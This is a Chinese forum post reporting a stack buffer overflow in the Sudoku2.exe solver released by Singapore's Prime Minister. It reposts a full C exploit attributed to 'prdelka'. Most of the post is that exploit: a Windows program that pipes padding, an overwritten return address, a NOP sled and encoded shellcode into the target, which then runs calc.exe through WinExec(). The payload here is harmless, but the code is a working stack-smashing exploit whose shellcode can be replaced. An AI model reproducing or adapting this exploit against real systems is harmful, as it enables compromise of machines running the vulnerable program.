新加坡总理编写的解数独程序Sudoku2.exe存在溢出漏洞

admin

参考这个新闻：http://www.chinabaiker.com/thread-1939-1-1.html


sudoku的源代码在google drive（需翻墙）：

https://t.co/5fVUGi7EqN

然后今天就刷到老外写的缓冲溢出漏洞的exp：

1. /* Sudoku2.exe stack overflow exploit
   
2.    ==================================
   
3.    The Prime Minister of Singapore recently demonstrated his programming skills
   
4.    by releasing source code and a binary for a C++ application "Sudoku Solver"
   
5.    written several years ago. David Litchfield discovered a stack based buffer
   
6.    overflow in scanf() alongside many other researchers. Source code and a 32bit
   
7.    binary have been provided for the application at the following URL:
   
8. 
   
9.    https://t.co/5fVUGi7EqN (also on Lee Hsien Loong facebook)
   
10. 
    
11.    This exploit uses standard stack smashing techniques to grab EIP, land in
    
12.    our buffer and WinExec()'s calc.exe. For great justice & the lulz. Tested
    
13.    on Win7 x64 against the Sudoku2.exe binary.
    
14. 
    
15.    greetingz to all .sg h4x0rz! ;-)
    
16. 
    
17.    -- prdelka
    
18. */
    
19. #include "stdafx.h"
    
20. #include <tchar.h>
    
21. #include <stdio.h>
    
22. #include <stdlib.h>
    
23. #include <memory.h>
    
24. #include <process.h>
    
25. #include <io.h>
    
26. #include <windows.h>
    
27. 
    
28. const char s[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    
29.      "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xe8\x40\xE3\x74\x90"
    
30.      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    
31.      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    
32.      "\xdb\xce\xd9\x74\x24\xf4\xb8\x2a\x06\xc3\xa2\x5b\x2b\xc9\xb1"
    
33.       "\x31\x31\x43\x18\x03\x43\x18\x83\xc3\x2e\xe4\x36\x5e\xc6\x6a"
    
34.      "\xb8\x9f\x16\x0b\x30\x7a\x27\x0b\x26\x0e\x17\xbb\x2c\x42\x9b"
    
35.      "\x30\x60\x77\x28\x34\xad\x78\x99\xf3\x8b\xb7\x1a\xaf\xe8\xd6"
    
36.      "\x98\xb2\x3c\x39\xa1\x7c\x31\x38\xe6\x61\xb8\x68\xbf\xee\x6f"
    
37.      "\x9d\xb4\xbb\xb3\x16\x86\x2a\xb4\xcb\x5e\x4c\x95\x5d\xd5\x17"
    
38.      "\x35\x5f\x3a\x2c\x7c\x47\x5f\x09\x36\xfc\xab\xe5\xc9\xd4\xe2"
    
39.      "\x06\x65\x19\xcb\xf4\x77\x5d\xeb\xe6\x0d\x97\x08\x9a\x15\x6c"
    
40.      "\x73\x40\x93\x77\xd3\x03\x03\x5c\xe2\xc0\xd2\x17\xe8\xad\x91"
    
41.      "\x70\xec\x30\x75\x0b\x08\xb8\x78\xdc\x99\xfa\x5e\xf8\xc2\x59"
    
42.      "\xfe\x59\xae\x0c\xff\xba\x11\xf0\xa5\xb1\xbf\xe5\xd7\x9b\xd5"
    
43.      "\xf8\x6a\xa6\x9b\xfb\x74\xa9\x8b\x93\x45\x22\x44\xe3\x59\xe1"
    
44.      "\x21\x1b\x10\xa8\x03\xb4\xfd\x38\x16\xd9\xfd\x96\x54\xe4\x7d"
    
45.      "\x13\x24\x13\x9d\x56\x21\x5f\x19\x8a\x5b\xf0\xcc\xac\xc8\xf1"
    
46.      "\xc4\xce\x8f\x61\x84\x3e\x2a\x02\x2f\x3f";
    
47. 
    
48. HANDLE g_hChildStd_IN_Rd = NULL;
    
49. HANDLE g_hChildStd_IN_Wr = NULL;
    
50. 
    
51. int _tmain(int argc, _TCHAR* argv[]) {
    
52.   TCHAR szCmdline[]=TEXT("Sudoku2.exe");
    
53.   STARTUPINFO si;
    
54.   PROCESS_INFORMATION pi;
    
55.   SECURITY_ATTRIBUTES saAttr;
    
56.   saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
    
57.   saAttr.bInheritHandle = TRUE;
    
58.   saAttr.lpSecurityDescriptor = NULL;
    
59.   CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &saAttr, 0);
    
60.   SetHandleInformation(g_hChildStd_IN_Wr, HANDLE_FLAG_INHERIT, 0);
    
61.   ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
    
62.   ZeroMemory( &si, sizeof(STARTUPINFO) );
    
63.   si.cb = sizeof(STARTUPINFO);
    
64.   si.hStdInput = g_hChildStd_IN_Rd;
    
65.   si.dwFlags |= STARTF_USESTDHANDLES;
    
66.   CreateProcess(NULL,szCmdline,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);
    
67.   CloseHandle(pi.hProcess);
    
68.   CloseHandle(pi.hThread);
    
69.   DWORD dwWritten;
    
70.   WriteFile(g_hChildStd_IN_Wr,s,strlen(s),&dwWritten,NULL);
    
71.   CloseHandle(g_hChildStd_IN_Wr);
    
72.       WaitForSingleObject( pi.hProcess, INFINITE );
    
73.   return 0;
    
74. }

复制代码